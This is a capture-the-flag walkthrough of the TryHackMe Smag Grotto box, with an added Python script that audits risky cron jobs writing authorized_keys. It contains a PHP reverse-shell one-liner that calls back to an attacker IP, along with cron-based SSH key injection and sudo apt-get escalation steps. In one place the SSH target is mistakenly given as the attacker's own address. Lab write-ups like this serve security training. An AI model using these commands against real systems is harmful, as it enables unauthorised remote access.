SMAG-GROTTO | THM
Executive Summary
The server has hardcoded credentials present within a public-facing email chain. Those credentials can be abused to gain access to an admin portal, and from there a reverse shell can be initiated. Once on the box itself, the SSH key infrastructure is vulnerable to injection: an attacker can inject their own SSH key pair and move laterally from there. Once on as a regular user, credentials can be extracted from easily accessible log files. The user can also escalate to root through sudo abuse of the apt-get program.
Technical Details
Enumeration
First, let's see what is running on the box:
nmap 10.10.6.75
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-20 01:12 EST
Nmap scan report for 10.10.6.75
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Let's navigate to the web server that is running. Not much is here, so let's enumerate the web server:
gobuster dir -w /SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 10.10.6.75 -x txt,php -t64
/mail (Status: 301) [Size: 307] [--> http://10.10.6.75/mail/]
/index.php (Status: 200) [Size: 402]
/mail is interesting. Upon investigation, there is a .pcap file discussed on this public-facing web server. There is a specific comment to use wget to download the file. If we download that file with wget and open it in Wireshark, it is a short capture with some TCP connections. Right-clicking and selecting "Follow TCP Stream" reveals credentials being transmitted in clear text.
Nice. There is one wrinkle: the POST request in the capture is aimed at the hostname development.smag.thm, so we need to tie that hostname to the IP address of the box. We can do that by editing our /etc/hosts file:
10.10.6.75 development.smag.thm
Then we can navigate to the endpoint that was found in the PCAP file. Upon navigating there we find a login screen.
Initial Foothold
When we log in, there is a prompt that lets us send a command. Perfect for a reverse shell. A simple one-liner from the Pentest Monkey reverse shell cheat sheet will work:
php -r '$sock=fsockopen("10.6.10.177",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
Lateral Movement
id shows we are www, and we can't read /home/jake/user.txt. After some basic Linux enumeration, we find an interesting crontab: a public key is being regularly copied into the user's SSH directory. We can inject our own key pair after running ssh-keygen -o on our own box, then wait for the cron job to run. Then we can SSH in with -i {path_to_key} jake@10.6.10.177.
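As an added defensive check (not part of this write-up), the audit below flags cron jobs that rewrite a user's authorized_keys from a source file that other users can modify or that does not exist yet, which is the weakness abused above. It assumes /etc/crontab-style entries; the sample crontab and its paths are constructed, not taken from the box.

```python
"""Audit cron jobs that copy a public key into ~/.ssh/authorized_keys."""
import os
import re
import stat

AUTH_KEYS_RE = re.compile(r"(?:\S*/)?\.ssh/authorized_keys")


def parse_cron_line(line):
    """Parse a /etc/crontab-style line into (schedule, user, command); None for comments/env."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    parts = line.split(None, 6)
    if len(parts) < 7:
        return None
    return " ".join(parts[:5]), parts[5], parts[6]


def others_can_write(path):
    """True if the group or world write bit is set on path; None if it does not exist."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return None
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_risky_entries(cron_text, writable=others_can_write):
    """Return one finding per (entry, source path) whose source is writable by others or missing."""
    findings = []
    for line in cron_text.splitlines():
        parsed = parse_cron_line(line)
        if parsed is None:
            continue
        schedule, user, cmd = parsed
        if not AUTH_KEYS_RE.search(cmd):
            continue
        for tok in (t.strip(";&|") for t in cmd.split()[1:]):  # skip the program itself
            if not tok.startswith(("/", "~")) or AUTH_KEYS_RE.search(tok):
                continue
            state = writable(tok)
            if state is None or state:
                findings.append({"user": user, "schedule": schedule, "source": tok,
                                 "reason": "missing" if state is None else "writable by others"})
    return findings


# Constructed sample crontab (hypothetical paths); the third entry is a benign control.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
*/1 * * * * root cp /tmp/pubkey.backup /home/jake/.ssh/authorized_keys
*/5 * * * * root cat /var/tmp/key.pub >> /home/jake/.ssh/authorized_keys
0 3 * * * root /usr/bin/apt-get update
"""

if __name__ == "__main__":
    for f in find_risky_entries(SAMPLE_CRONTAB):
        print(f"[!] {f['user']} cron ({f['schedule']}) fills authorized_keys from {f['source']}: {f['reason']}")
```

The fix on the defending side is the same either way: keep the key source root-owned and mode 0644 or lower, or drop the cron job entirely.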
Priv Esc
Now we are in as Jake. Privilege escalation isn't needed to read the root flag; you can just read the vim history. Running the classic sudo -l reveals a viable path to escalation through sudo apt-get. Follow the instructions on GTFOBins to achieve this.
This sparse write-up will be made more detailed in the future.